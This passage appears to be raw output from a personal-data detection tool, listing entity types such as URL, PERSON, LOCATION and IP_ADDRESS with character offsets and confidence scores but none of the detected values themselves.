0.85, type: LOCATION, start: 11787, end: 11828, score: 0.85, type: DATE_TIME, start: 13097, end: 13102, score: 0.85, type: DATE_TIME, start: 13188, end: 13194, score: 0.85, type: DATE_TIME, start: 13333, end: 13340, score: 0.85, type: DATE_TIME, start: 13404, end: 13434, score: 0.85, type: PERSON, start: 13737, end: 13745, score: 0.85, type: URL, start: 13857, end: 13865, score: 0.85, type: URL, start: 13898, end: 13906, score: 0.85, type: URL, start: 13939, end: 13947, score: 0.85, type: URL, start: 14149, end: 14167, score: 0.85, type: PERSON, start: 15151, end: 15160, score: 0.85, type: URL, start: 740, end: 768, score: 0.6, type: URL, start: 1005, end: 1019, score: 0.5, type: URL, start: 1043, end: 1052, score: 0.5, type: URL, start: 1073, end: 1087, score: 0.5, type: URL, start: 1116, end: 1125, score: 0.5, type: URL, start: 1173, end: 1200, score: 0.5, type: URL, start: 1291, end: 1311, score: 0.5, type: URL, start: 1347, end: 1374, score: 0.5, type: URL, start: 1443, end: 1456, score: 0.5, type: URL, start: 1487, end: 1500, score: 0.5, type: URL, start: 1503, end: 1509, score: 0.5, type: URL, start: 1533, end: 1546, score: 0.5, type: URL, start: 1549, end: 1555, score: 0.5, type: URL, start: 1588, end: 1601, score: 0.5, type: URL, start: 1645, end: 1653, score: 0.5, type: URL, start: 1695, end: 1710, score: 0.5, type: URL, start: 1928, end: 1937, score: 0.5, type: URL, start: 2045, end: 2052, score: 0.5, type: URL, start: 2268, end: 2277, score: 0.5, type: URL, start: 2339, end: 2344, score: 0.5, type: URL, start: 2356, end: 2370, score: 0.5, type: URL, start: 3061, end: 3072, score: 0.5, type: URL, start: 3197, end: 3204, score: 0.5, type: URL, start: 3306, end: 3316, score: 0.5, type: URL, start: 3350, end: 3356, score: 0.5, type: URL, start: 3566, end: 3580, score: 0.5, type: URL, start: 3583, end: 3588, score: 0.5, type: URL, start: 3737, end: 3751, score: 0.5, type: URL, start: 4360, end: 4369, score: 0.5, type: URL, start: 4456, end: 4467, score: 0.5, type: URL, start: 4614, end: 4621, score: 0.5, type: URL, start: 4738, end: 4744, score: 0.5, type: URL, start: 4746, end: 4758, score: 0.5, type: URL, start: 4858, end: 4872, score: 0.5, type: URL, start: 5493, end: 5504, score: 0.5, type: URL, start: 5511, end: 5527, score: 0.5, type: URL, start: 5703, end: 5717, score: 0.5, type: URL, start: 6044, end: 6053, score: 0.5, type: URL, start: 6161, end: 6168, score: 0.5, type: URL, start: 6515, end: 6526, score: 0.5, type: URL, start: 7333, end: 7342, score: 0.5, type: URL, start: 7494, end: 7501, score: 0.5, type: URL, start: 7670, end: 7679, score: 0.5, type: URL, start: 7744, end: 7749, score: 0.5, type: URL, start: 7801, end: 7808, score: 0.5, type: URL, start: 7820, end: 7825, score: 0.5, type: URL, start: 7878, end: 7885, score: 0.5, type: URL, start: 7900, end: 7905, score: 0.5, type: URL, start: 8231, end: 8249, score: 0.5, type: URL, start: 8317, end: 8324, score: 0.5, type: URL, start: 8634, end: 8648, score: 0.5, type: URL, start: 8681, end: 8686, score: 0.5, type: URL, start: 8952, end: 8965, score: 0.5, type: URL, start: 8988, end: 8993, score: 0.5, type: URL, start: 9040, end: 9054, score: 0.5, type: URL, start: 9486, end: 9500, score: 0.5, type: URL, start: 9642, end: 9656, score: 0.5, type: URL, start: 9994, end: 10008, score: 0.5, type: URL, start: 10074, end: 10088, score: 0.5, type: URL, start: 10204, end: 10215, score: 0.5, type: URL, start: 10468, end: 10482, score: 0.5, type: URL, start: 10549, end: 10563, score: 0.5, type: URL, start: 10612, end: 10620, score: 0.5, type: URL, start: 10649, end: 10663, score: 0.5, type: URL, start: 11485, end: 11500, score: 0.5, type: URL, start: 11690, end: 11697, score: 0.5, type: URL, start: 12085, end: 12099, score: 0.5, type: URL, start: 12244, end: 12258, score: 0.5, type: URL, start: 12306, end: 12322, score: 0.5, type: URL, start: 12336, end: 12350, score: 0.5, type: URL, start: 12596, end: 12600, score: 0.5, type: URL, start: 13285, end: 13303, score: 0.5, type: URL, start: 13580, end: 13592, score: 0.5, type: URL, start: 13701, end: 13709, score: 0.5, type: URL, start: 13724, end: 13733, score: 0.5, type: URL, start: 13753, end: 13761, score: 0.5, type: URL, start: 13783, end: 13791, score: 0.5, type: URL, start: 13822, end: 13830, score: 0.5, type: URL, start: 14027, end: 14035, score: 0.5, type: URL, start: 14180, end: 14188, score: 0.5, type: URL, start: 14240, end: 14246, score: 0.5, type: URL, start: 14298, end: 14303, score: 0.5, type: URL, start: 14332, end: 14337, score: 0.5, type: URL, start: 14363, end: 14381, score: 0.5, type: URL, start: 15235, end: 15249, score: 0.5, type: URL, start: 15334, end: 15348, score: 0.5, type: URL, start: 15471, end: 15485, score: 0.5, type: URL, start: 15554, end: 15568, score: 0.5, type: URL, start: 15621, end: 15635, score: 0.5, type: URL, start: 15673, end: 15687, score: 0.5, type: URL, start: 15699, end: 15713, score: 0.5, type: URL, start: 15777, end: 15791, score: 0.5, type: URL, start: 15909, end: 15923, score: 0.5, type: URL, start: 15985, end: 15999, score: 0.5, type: URL, start: 16067, end: 16081, score: 0.5, type: URL, start: 16158, end: 16172, score: 0.5, type: URL, start: 16273, end: 16287, score: 0.5, type: URL, start: 16389, end: 16395, score: 0.5, type: URL, start: 16453, end: 16467, score: 0.5, type: URL, start: 16476, end: 16483, score: 0.5, type: DATE_TIME, start: 36, end: 40, score: 0.85, type: PERSON, start: 1888, end: 1920, score: 0.85, type: PERSON, start: 2137, end: 2142, score: 0.85, type: LOCATION, start: 2239, end: 2248, score: 0.85, type: DATE_TIME, start: 2376, end: 2396, score: 0.85, type: DATE_TIME, start: 2641, end: 2643, score: 0.85, type: PERSON, start: 2961, end: 2983, score: 0.85, type: LOCATION, start: 3051, end: 3070, score: 0.85, type: PERSON, start: 3855, end: 3866, score: 0.85, type: PERSON, start: 4192, end: 4203, score: 0.85, type: DATE_TIME, start: 4309, end: 4330, score: 0.85, type: PERSON, start: 4361, end: 4372, score: 0.85, type: PERSON, start: 4603, end: 4614, score: 0.85, type: PERSON, start: 5564, end: 5572, score: 0.85, type: URL, start: 153, end: 204, score: 0.6, type: IP_ADDRESS, start: 2535, end: 2537, score: 0.6, type: IP_ADDRESS, start: 5376, end: 5385, score: 0.6, type: URL, start: 418, end: 427, score: 0.5, type: URL, start: 579, end: 586, score: 0.5, type: URL, start: 638, end: 645, score: 0.5, type: URL, start: 650, end: 660, score: 0.5, type: URL, start: 904, end: 916, score: 0.5, type: URL, start: 975, end: 982, score: 0.5, type: URL, start: 1043, end: 1055, score: 0.5, type: URL, start: 1144, end: 1151, score: 0.5, type: URL, start: 1905, end: 1914, score: 0.5, type: URL, start: 2087, end: 2095, score: 0.5, type: URL, start: 2171, end: 2178, score: 0.5, type: URL, start: 2186, end: 2193, score: 0.5, type: URL, start: 2309, end: 2319, score: 0.5, type: URL, start: 2487, end: 2499, score: 0.5, type: URL, start: 2701, end: 2711, score: 0.5, type: URL, start: 2771, end: 2778, score: 0.5, type: URL, start: 2835, end: 2844, score: 0.5, type: URL, start: 2917, end: 2924, score: 0.5, type: URL, start: 3031, end: 3041, score: 0.5, type: URL, start: 3433, end: 3440, score: 0.5, type: URL, start: 3538, end: 3545, score: 0.5, type: URL, start: 3891, end: 3897, score: 0.5, type: URL, start: 3922, end: 3929, score: 0.5, type: URL, start: 4008, end: 4014, score: 0.5, type: URL, start: 4044, end: 4051, score: 0.5, type: URL, start: 4128, end: 4135, score: 0.5, type: URL, start: 4334, end: 4341, score: 0.5, type: URL, start: 4415, end: 4422, score: 0.5, type: URL, start: 4448, end: 4455, score: 0.5, type: URL, start: 4571, end: 4578, score: 0.5, type: URL, start: 4670, end: 4677, score: 0.5, type: URL, start: 4883, end: 4890, score: 0.5, type: URL, start: 4993, end: 4999, score: 0.5, type: URL, start: 5025, end: 5035, score: 0.5, type: URL, start: 5074, end: 5080, score: 0.5, type: URL, start: 5132, end: 5137, score: 0.5, type: URL, start: 5210, end: 5215, score: 0.5, type: URL, start: 5289, end: 5293, score: 0.5, type: URL, start: 5303, end: 5307, score: 0.5, type: URL, start: 5315, end: 5319, score: 0.5, type: URL, start: 6055, end: 6059, score: 0.5, type: URL, start: 6088, end: 6095, score: 0.5, type: URL, start: 6184, end: 6191, score: 0.5, type: URL, start: 6303, end: 6310, score: 0.5, type: URL, start: 6356, end: 6363, score: 0.5, type: IP_ADDRESS, start: 19786, end: 19795, score: 0.95, type: IP_ADDRESS, start: 20287, end: 20296, score: 0.95, type: IP_ADDRESS, start: 21852, end: 21864, score: 0.95, type: IP_ADDRESS, start: 21910, end: 21922, score: 0.95, type: IP_ADDRESS, start: 37213, end: 37221, score: 0.95, type: IP_ADDRESS, start: 37250, end: 37259, score: 0.95, type: IP_ADDRESS, start: 37311, end: 37323, score: 0.95, type: IP_ADDRESS, start: 37364, end: 37376, score: 0.95, type: IP_ADDRESS, start: 38376, end: 38388, score: 0.95, type: IP_ADDRESS, start: 38434, end: 38446, score: 0.95, type: IP_ADDRESS, start: 38934, end: 38943, score: 0.95, type: IP_ADDRESS, start: 39084, end: 39093, score: 0.95, type: IP_ADDRESS, start: 39251, end: 39263, score: 0.95, type: IP_ADDRESS, start: 39309, end: 39321, score: 0.95, type: IP_ADDRESS, start: 40602, end: 40611, score: 0.95, type: IP_ADDRESS, start: 42125, end: 42134, score: 0.95, type: PERSON, start: 853, end: 876, score: 0.85, type: PERSON, start: 1620, end: 1626, score: 0.85, type: PERSON, start: 3142, end: 3148, score: 0.85, type: PERSON, start: 7114, end: 7146, score: 0.85, type: PERSON, start: 7342, end: 7374, score: 0.85, type: PERSON, start: 7646, end: 7667, score: 0.85, type: LOCATION, start: 9658, end: 9686, score: 0.85, type: PERSON, start: 9752, end: 9778, score: 0.85, type: PERSON, start: 13717, end: 13726, score: 0.85, type: LOCATION, start: 13939, end: 13988, score: 0.85, type: LOCATION, start: 14377, end: 14426, score: 0.85, type: LOCATION, start: 14650, end: 14699, score: 0.85, type: PERSON, start: 17000, end: 17032, score: 0.85, type: LOCATION, start: 17202, end: 17213, score: 0.85, type: LOCATION, start: 17433, end: 17444, score: 0.85, type: PERSON, start: 18410, end: 18421, score: 0.85, type: LOCATION, start: 18600, end: 18649, score: 0.85, type: PERSON, start: 18773, end: 18799, score: 0.85, type: PERSON, start: 19207, end: 19233, score: 0.85, type: PERSON, start: 19643, end: 19669, score: 0.85, type: PERSON, start: 20144, end: 20170, score: 0.85, type: LOCATION, start: 23632, end: 23681, score: 0.85, type: LOCATION, start: 23981, end: 24030, score: 0.85, type: PERSON, start: 27854, end: 27886, score: 0.85, type: PERSON, start: 28480, end: 28486, score: 0.85, type: PERSON, start: 29034, end: 29040, score: 0.85, type: PERSON, start: 29235, end: 29267, score: 0.85, type: PERSON, start: 29715, end: 29721, score: 0.85, type: PERSON, start: 29879, end: 29911, score: 0.85, type: PERSON, start: 30401, end: 30407, score: 0.85, type: PERSON, start: 30754, end: 30786, score: 0.85, type: PERSON, start: 31517, end: 31523, score: 0.85, type: PERSON, start: 31951, end: 31983, score: 0.85, type: PERSON, start: 32477, end: 32483, score: 0.85, type: PERSON, start: 32837, end: 32869, score: 0.85, type: PERSON, start: 33272, end: 33276, score: 0.85, type: PERSON, start: 33695, end: 33701, score: 0.85, type: PERSON, start: 34406, end: 34438, score: 0.85, type: PERSON, start: 34480, end: 34512, score: 0.85, type: PERSON, start: 35025, end: 35057, score: 0.85, type: PERSON, start: 35466, end: 35472, score: 0.85, type: PERSON, start: 35860, end: 35892, score: 0.85, type: PERSON, start: 36274, end: 36306, score: 0.85, type: PERSON, start: 36828, end: 36860, score: 0.85, type: PERSON, start: 40195, end: 40227, score: 0.85, type: PERSON, start: 41150, end: 41189, score: 0.85, type: PERSON, start: 41718, end: 41750, score: 0.85, type: PERSON, start: 42680, end: 42684, score: 0.85, type: PERSON, start: 43031, end: 43074, score: 0.85, type: PERSON, start: 43635, end: 43667, score: 0.85, type: PERSON, start: 44882, end: 44888, score: 0.85, type: PERSON, start: 46001, end: 46007, score: 0.85, type: PERSON, start: 46160, end: 46203, score: 0.85, type: PERSON, start: 46514, end: 46564, score: 0.85, type: PERSON, start: 46784, end: 46816, score: 0.85, type: PERSON, start: 47307, end: 47339, score: 0.85, type: PERSON, start: 50903, end: 50935, score: 0.85, type: PERSON, start: 51115, end: 51147, score: 0.85, type: PERSON, start: 51527, end: 51559, score: 0.85, type: PERSON, start: 52406, end: 52430, score: 0.85, type: PERSON, start: 52925, end: 52949, score: 0.85, type: PERSON, start: 56092, end: 56124, score: 0.85, type: PERSON, start: 57090, end: 57122, score: 0.85, type: PERSON, start: 57723, end: 57729, score: 0.85, type: DATE_TIME, start: 62055, end: 62079, score: 0.85, type: DATE_TIME, start: 1116, end: 1126, score: 0.6, type: DATE_TIME, start: 7260, end: 7270, score: 0.6, type: IP_ADDRESS, start: 17077, end: 17085, score: 0.6, type: IP_ADDRESS, start: 17134, end: 17142, score: 0.6, type: IP_ADDRESS, start: 17308, end: 17316, score: 0.6, type: IP_ADDRESS, start: 17365, end: 17373, score: 0.6, type: IP_ADDRESS, start: 40271, end: 40279, score: 0.6, type: IP_ADDRESS, start: 40326, end: 40334, score: 0.6, type: IP_ADDRESS, start: 41794, end: 41802, score: 0.6, type: IP_ADDRESS, start: 41849, end: 41857, score: 0.6, type: IP_ADDRESS, start: 43711, end: 43719, score: 0.6, type: IP_ADDRESS, start: 43766, end: 43774, score: 0.6, type: URL, start: 204, end: 215, score: 0.5, type: URL, start: 498, end: 504, score: 0.5, type: URL, start: 527, end: 536, score: 0.5, type: URL, start: 573, end: 582, score: 0.5, type: URL, start: 681, end: 688, score: 0.5, type: URL, start: 739, end: 746, score: 0.5, type: URL, start: 860, end: 867, score: 0.5, type: URL, start: 898, end: 905, score: 0.5, type: URL, start: 1016, end: 1028, score: 0.5, type: URL, start: 1212, end: 1223, score: 0.5, type: URL, start: 1323, end: 1330, score: 0.5, type: URL, start: 1376, end: 1387, score: 0.5, type: URL, start: 1391, end: 1398, score: 0.5, type: URL, start: 1432, end: 1450, score: 0.5, type: URL, start: 1470, end: 1489, score: 0.5, type: URL, start: 1665, end: 1672, score: 0.5, type: URL, start: 1704, end: 1725, score: 0.5, type: URL, start: 1745, end: 1769, score: 0.5, type: URL, start: 1807, end: 1821, score: 0.5, type: URL, start: 1836, end: 1853, score: 0.5, type: URL, start: 1895, end: 1902, score: 0.5, type: URL, start: 1927, end: 1942, score: 0.5, type: URL, start: 1984, end: 1990, score: 0.5, type: URL, start: 2001, end: 2015, score: 0.5, type: URL, start: 2063, end: 2075, score: 0.5, type: URL, start: 2130, end: 2144, score: 0.5, type: URL, start: 2155, end: 2166, score: 0.5, type: URL, start: 2172, end: 2189, score: 0.5, type: URL, start: 2215, end: 2226, score: 0.5, type: URL, start: 2231, end: 2238, score: 0.5, type: URL, start: 2294, end: 2299, score: 0.5, type: URL, start: 2322, end: 2343, score: 0.5, type: URL, start: 2392, end: 2403, score: 0.5, type: URL, start: 2469, end: 2479, score: 0.5, type: URL, start: 2585, end: 2597, score: 0.5, type: URL, start: 2627, end: 2634, score: 0.5, type: URL, start: 2679, end: 2688, score: 0.5, type: URL, start: 2693, end: 2700, score: 0.5, type: URL, start: 2707, end: 2712, score: 0.5, type: URL, start: 2723, end: 2734, score: 0.5, type: URL, start: 2740, end: 2756, score: 0.5, type: URL, start: 2860, end: 2871, score: 0.5, type: URL, start: 2892, end: 2903, score: 0.5, type: URL, start: 2907, end: 2914, score: 0.5, type: URL, start: 2948, end: 2966, score: 0.5, type: URL, start: 2986, end: 3005, score: 0.5, type: URL, start: 3199, end: 3210, score: 0.5, type: URL, start: 3233, end: 3240, score: 0.5, type: URL, start: 3309, end: 3326, score: 0.5, type: URL, start: 3430, end: 3438, score: 0.5, type: URL, start: 3483, end: 3494, score: 0.5, type: URL, start: 3845, end: 3864, score: 0.5, type: URL, start: 4010, end: 4029, score: 0.5, type: URL, start: 4119, end: 4127, score: 0.5, type: URL, start: 4172, end: 4183, score: 0.5, type: URL, start: 4535, end: 4554, score: 0.5, type: URL, start: 4700, end: 4719, score: 0.5, type: URL, start: 4814, end: 4822, score: 0.5, type: URL, start: 4867, end: 4878, score: 0.5, type: URL, start: 5131, end: 5150, score: 0.5, type: URL, start: 5374, end: 5389, score: 0.5, type: URL, start: 5490, end: 5498, score: 0.5, type: URL, start: 5542, end: 5553, score: 0.5, type: URL, start: 5867, end: 5886, score: 0.5, type: URL, start: 5910, end: 5921, score: 0.5, type: URL, start: 6100, end: 6119, score: 0.5, type: URL, start: 6207, end: 6215, score: 0.5, type: URL, start: 6259, end: 6270, score: 0.5, type: URL, start: 6494, end: 6513, score: 0.5, type: URL, start: 6577, end: 6588, score: 0.5, type: URL, start: 6655, end: 6666, score: 0.5, type: URL, start: 6704, end: 6724, score: 0.5, type: URL, start: 6741, end: 6752, score: 0.5, type: URL, start: 6823, end: 6834, score: 0.5, type: URL, start: 6992, end: 7003, score: 0.5, type: URL, start: 7121, end: 7128, score: 0.5, type: URL, start: 7182, end: 7199, score: 0.5, type: URL, start: 7212, end: 7222, score: 0.5, type: URL, start: 7349, end: 7356, score: 0.5, type: URL, start: 7409, end: 7416, score: 0.5, type: URL, start: 7459, end: 7473, score: 0.5, type: URL, start: 7496, end: 7503, score: 0.5, type: URL, start: 7529, end: 7543, score: 0.5, type: URL, start: 7551, end: 7558, score: 0.5, type: URL, start: 7563, end: 7574, score: 0.5, type: URL, start: 7618, end: 7625, score: 0.5, type: URL, start: 7651, end: 7665, score: 0.5, type: URL, start: 7673, end: 7680, score: 0.5, type: URL, start: 7685, end: 7696, score: 0.5, type: URL, start: 7740, end: 7747, score: 0.5, type: URL, start: 7774, end: 7788, score: 0.5, type: URL, start: 7796, end: 7803, score: 0.5, type: URL, start: 7808, end: 7819, score: 0.5, type: URL, start: 7872, end: 7879, score: 0.5, type: URL, start: 7971, end: 7981, score: 0.5, type: URL, start: 8018, end: 8025, score: 0.5, type: URL, start: 8129, end: 8133, score: 0.5, type: URL, start: 8138, end: 8145, score: 0.5, type: URL, start: 8152, end: 8157, score: 0.5, type: URL, start: 8168, end: 8179, score: 0.5, type: URL, start: 8236, end: 8240, score: 0.5, type: URL, start: 8245, end: 8252, score: 0.5, type: URL, start: 8257, end: 8264, score: 0.5, type: URL, start: 8275, end: 8286, score: 0.5, type: URL, start: 8352, end: 8356, score: 0.5, type: URL, start: 8361, end: 8368, score: 0.5, type: URL, start: 8379, end: 8390, score: 0.5, type: URL, start: 8409, end: 8425, score: 0.5, type: URL, start: 8436, end: 8454, score: 0.5, type: URL, start: 8466, end: 8477, score: 0.5, type: URL, start: 8564, end: 8571, score: 0.5, type: URL, start: 8601, end: 8608, score: 0.5, type: URL, start: 8676, end: 8690, score: 0.5, type: URL, start: 8718, end: 8725, score: 0.5, type: URL, start: 8758, end: 8770, score: 0.5, type: URL, start: 8777, end: 8792, score: 0.5, type: URL, start: 8853, end: 8877, score: 0.5, type: URL, start: 8904, end: 8918, score: 0.5, type: URL, start: 8928, end: 8934, score: 0.5, type: URL, start: 8945, end: 8957, score: 0.5, type: URL, start: 8979, end: 8986, score: 0.5, type: URL, start: 9019, end: 9031, score: 0.5, type: URL, start: 9033, end: 9045, score: 0.5, type: URL, start: 9052, end: 9067, score: 0.5, type: URL, start: 9128, end: 9152, score: 0.5, type: URL, start: 9195, end: 9206, score: 0.5, type: URL, start: 9223, end: 9237, score: 0.5, type: URL, start: 9259, end: 9265, score: 0.5, type: URL, start: 9277, end: 9289, score: 0.5, type: URL, start: 9291, end: 9303, score: 0.5, type: URL, start: 9431, end: 9438, score: 0.5, type: URL, start: 9471, end: 9483, score: 0.5, type: URL, start: 9504, end: 9520, score: 0.5, type: URL, start: 9532, end: 9552, score: 0.5, type: URL, start: 9565, end: 9583, score: 0.5, type: URL, start: 9603, end: 9614, score: 0.5, type: URL, start: 9620, end: 9625, score: 0.5, type: URL, start: 9630, end: 9639, score: 0.5, type: URL, start: 9703, end: 9711, score: 0.5, type: URL, start: 9759, end: 9767, score: 0.5, type: URL, start: 9827, end: 9834, score: 0.5, type: URL, start: 9908, end: 9917, score: 0.5, type: URL, start: 9993, end: 10008, score: 0.5, type: URL, start: 10076, end: 10084, score: 0.5, type: URL, start: 10089, end: 10098, score: 0.5, type: URL, start: 10113, end: 10122, score: 0.5, type: URL, start: 10212, end: 10227, score: 0.5, type: URL, start: 10282, end: 10290, score: 0.5, type: URL, start: 10346, end: 10354, score: 0.5, type: URL, start: 10407, end: 10413, score: 0.5, type: URL, start: 11144, end: 11151, score: 0.5, type: URL, start: 11181, end: 11188, score: 0.5, type: URL, start: 11267, end: 11281, score: 0.5, type: URL, start: 11320, end: 11332, score: 0.5, type: URL, start: 11355, end: 11362, score: 0.5, type: URL, start: 11429, end: 11444, score: 0.5, type: URL, start: 11578, end: 11589, score: 0.5, type: URL, start: 11673, end: 11685, score: 0.5, type: URL, start: 11687, end: 11699, score: 0.5, type: URL, start: 11723, end: 11730, score: 0.5, type: URL, start: 11759, end: 11771, score: 0.5, type: URL, start: 11827, end: 11842, score: 0.5, type: URL, start: 11885, end: 11896, score: 0.5, type: URL, start: 11953, end: 11959, score: 0.5, type: URL, start: 11971, end: 11983, score: 0.5, type: URL, start: 12006, end: 12013, score: 0.5, type: URL, start: 12042, end: 12054, score: 0.5, type: URL, start: 12222, end: 12229, score: 0.5, type: URL, start: 12269, end: 12282, score: 0.5, type: URL, start: 12310, end: 12317, score: 0.5, type: URL, start: 12323, end: 12343, score: 0.5, type: URL, start: 12412, end: 12422, score: 0.5, type: URL, start: 12532, end: 12539, score: 0.5, type: URL, start: 12569, end: 12576, score: 0.5, type: URL, start: 12655, end: 12669, score: 0.5, type: URL, start: 12697, end: 12704, score: 0.5, type: URL, start: 12747, end: 12759, score: 0.5, type: URL, start: 12837, end: 12850, score: 0.5, type: URL, start: 12905, end: 12911, score: 0.5, type: URL, start: 12922, end: 12934, score: 0.5, type: URL, start: 12956, end: 12963, score: 0.5, type: URL, start: 13016, end: 13028, score: 0.5, type: URL, start: 13030, end: 13042, score: 0.5, type: URL, start: 13115, end: 13128, score: 0.5, type: URL, start: 13171, end: 13178, score: 0.5, type: URL, start: 13245, end: 13260, score: 0.5, type: URL, start: 13370, end: 13377, score: 0.5, type: URL, start: 13408, end: 13415, score: 0.5, type: URL, start: 13458, end: 13463, score: 0.5, type: URL, start: 13485, end: 13500, score: 0.5, type: URL, start: 13530, end: 13537, score: 0.5, type: URL, start: 13580, end: 13585, score: 0.5, type: URL, start: 13607, end: 13622, score: 0.5, type: URL, start: 13652, end: 13659, score: 0.5, type: URL, start: 13729, end: 13744, score: 0.5, type: URL, start: 13775, end: 13782, score: 0.5, type: URL, start: 13828, end: 13833, score: 0.5, type: URL, start: 13897, end: 13912, score: 0.5, type: URL, start: 13954, end: 13967, score: 0.5, type: URL, start: 14009, end: 14022, score: 0.5, type: URL, start: 14171, end: 14183, score: 0.5, type: URL, start: 14185, end: 14197, score: 0.5, type: URL, start: 14221, end: 14228, score: 0.5, type: URL, start: 14335, end: 14350, score: 0.5, type: URL, start: 14392, end: 14405, score: 0.5, type: URL, start: 14460, end: 14466, score: 0.5, type: URL, start: 14477, end: 14489, score: 0.5, type: URL, start: 14511, end: 14518, score: 0.5, type: URL, start: 14586, end: 14591, score: 0.5, type: URL, start: 14608, end: 14623, score: 0.5, type: URL, start: 14665, end: 14678, score: 0.5, type: URL, start: 14720, end: 14733, score: 0.5, type: URL, start: 14775, end: 14788, score: 0.5, type: URL, start: 15001, end: 15013, score: 0.5, type: URL, start: 15015, end: 15027, score: 0.5, type: URL, start: 15029, end: 15041, score: 0.5, type: URL, start: 15065, end: 15072, score: 0.5, type: URL, start: 15176, end: 15191, score: 0.5, type: URL, start: 15299, end: 15306, score: 0.5, type: URL, start: 15336, end: 15343, score: 0.5, type: URL, start: 15422, end: 15436, score: 0.5, type: URL, start: 15448, end: 15460, score: 0.5, type: URL, start: 15511, end: 15518, score: 0.5, type: URL, start: 15577, end: 15586, score: 0.5, type: URL, start: 15698, end: 15711, score: 0.5, type: URL, start: 15743, end: 15755, score: 0.5, type: URL, start: 15757, end: 15769, score: 0.5, type: URL, start: 15799, end: 15803, score: 0.5, type: URL, start: 15867, end: 15874, score: 0.5, type: URL, start: 15999, end: 16012, score: 0.5, type: URL, start: 16067, end: 16073, score: 0.5, type: URL, start: 16084, end: 16096, score: 0.5, type: URL, start: 16189, end: 16196, score: 0.5, type: URL, start: 16226, end: 16233, score: 0.5, type: URL, start: 16301, end: 16315, score: 0.5, type: URL, start: 16327, end: 16334, score: 0.5, type: URL, start: 16367, end: 16379, score: 0.5, type: URL, start: 16459, end: 16466, score: 0.5, type: URL, start: 16568, end: 16575, score: 0.5, type: URL, start: 16678, end: 16691, score: 0.5, type: URL, start: 16757, end: 16763, score: 0.5, type: URL, start: 16774, end: 16786, score: 0.5, type: URL, start: 16818, end: 16831, score: 0.5, type: URL, start: 16896, end: 16902, score: 0.5, type: URL, start: 16913, end: 16925, score: 0.5, type: URL, start: 17007, end: 17014, score: 0.5, type: URL, start: 17060, end: 17067, score: 0.5, type: URL, start: 17105, end: 17112, score: 0.5, type: URL, start: 17124, end: 17131, score: 0.5, type: URL, start: 17167, end: 17174, score: 0.5, type: URL, start: 17225, end: 17235, score: 0.5, type: URL, start: 17253, end: 17268, score: 0.5, type: URL, start: 17291, end: 17298, score: 0.5, type: URL, start: 17336, end: 17343, score: 0.5, type: URL, start: 17355, end: 17362, score: 0.5, type: URL, start: 17398, end: 17405, score: 0.5, type: URL, start: 17456, end: 17466, score: 0.5, type: URL, start: 17484, end: 17499, score: 0.5, type: URL, start: 17531, end: 17538, score: 0.5, type: URL, start: 17576, end: 17583, score: 0.5, type: URL, start: 17590, end: 17606, score: 0.5, type: URL, start: 17649, end: 17662, score: 0.5, type: URL, start: 17718, end: 17724, score: 0.5, type: URL, start: 17735, end: 17747, score: 0.5, type: URL, start: 17787, end: 17792, score: 0.5, type: URL, start: 17803, end: 17810, score: 0.5, type: URL, start: 17853, end: 17858, score: 0.5, type: URL, start: 17869, end: 17879, score: 0.5, type: URL, start: 17902, end: 17909, score: 0.5, type: URL, start: 17947, end: 17954, score: 0.5, type: URL, start: 17961, end: 17977, score: 0.5, type: URL, start: 18020, end: 18033, score: 0.5, type: URL, start: 18089, end: 18095, score: 0.5, type: URL, start: 18106, end: 18118, score: 0.5, type: URL, start: 18158, end: 18163, score: 0.5, type: URL, start: 18174, end: 18181, score: 0.5, type: URL, start: 18224, end: 18229, score: 0.5, type: URL, start: 18240, end: 18250, score: 0.5, type: URL, start: 18338, end: 18345, score: 0.5, type: URL, start: 18375, end: 18382, score: 0.5, type: URL, start: 18438, end: 18452, score: 0.5, type: URL, start: 18480, end: 18487, score: 0.5, type: URL, start: 18615, end: 18628, score: 0.5, type: URL, start: 18724, end: 18732, score: 0.5, type: URL, start: 18780, end: 18788, score: 0.5, type: URL, start: 18819, end: 18826, score: 0.5, type: URL, start: 18909, end: 18918, score: 0.5, type: URL, start: 19158, end: 19166, score: 0.5, type: URL, start: 19214, end: 19222, score: 0.5, type: URL, start: 19253, end: 19260, score: 0.5, type: URL, start: 19343, end: 19352, score: 0.5, type: URL, start: 19594, end: 19602, score: 0.5, type: URL, start: 19650, end: 19658, score: 0.5, type: URL, start: 19689, end: 19696, score: 0.5, type: URL, start: 19822, end: 19831, score: 0.5, type: URL, start: 19907, end: 19926, score: 0.5, type: URL, start: 20095, end: 20103, score: 0.5, type: URL, start: 20151, end: 20159, score: 0.5, type: URL, start: 20190, end: 20197, score: 0.5, type: URL, start: 20323, end: 20332, score: 0.5, type: URL, start: 20407, end: 20427, score: 0.5, type: URL, start: 20472, end: 20505, score: 0.5, type: URL, start: 20702, end: 20710, score: 0.5, type: URL, start: 20751, end: 20760, score: 0.5, type: URL, start: 20825, end: 20834, score: 0.5, type: URL, start: 20955, end: 20964, score: 0.5, type: URL, start: 21009, end: 21020, score: 0.5, type: URL, start: 21217, end: 21225, score: 0.5, type: URL, start: 21278, end: 21287, score: 0.5, type: URL, start: 21388, end: 21397, score: 0.5, type: URL, start: 21518, end: 21527, score: 0.5, type: URL, start: 21572, end: 21583, score: 0.5, type: URL, start: 21769, end: 21777, score: 0.5, type: URL, start: 21940, end: 21949, score: 0.5, type: URL, start: 22030, end: 22039, score: 0.5, type: URL, start: 22141, end: 22150, score: 0.5, type: URL, start: 22265, end: 22274, score: 0.5, type: URL, start: 22381, end: 22396, score: 0.5, type: URL, start: 22496, end: 22503, score: 0.5, type: URL, start: 22533, end: 22540, score: 0.5, type: URL, start: 22619, end: 22633, score: 0.5, type: URL, start: 22645, end: 22657, score: 0.5, type: URL, start: 22685, end: 22697, score: 0.5, type: URL, start: 22725, end: 22737, score: 0.5, type: URL, start: 22765, end: 22777, score: 0.5, type: URL, start: 22810, end: 22822, score: 0.5, type: URL, start: 22866, end: 22873, score: 0.5, type: URL, start: 22982, end: 22997, score: 0.5, type: URL, start: 23040, end: 23047, score: 0.5, type: URL, start: 23178, end: 23193, score: 0.5, type: URL, start: 23235, end: 23248, score: 0.5, type: URL, start: 23303, end: 23309, score: 0.5, type: URL, start: 23320, end: 23332, score: 0.5, type: URL, start: 23366, end: 23372, score: 0.5, type: URL, start: 23383, end: 23395, score: 0.5, type: URL, start: 23417, end: 23424, score: 0.5, type: URL, start: 23590, end: 23605, score: 0.5, type: URL, start: 23647, end: 23660, score: 0.5, type: URL, start: 23715, end: 23721, score: 0.5, type: URL, start: 23732, end: 23744, score: 0.5, type: URL, start: 23766, end: 23773, score: 0.5, type: URL, start: 23939, end: 23954, score: 0.5, type: URL, start: 23996, end: 24009, score: 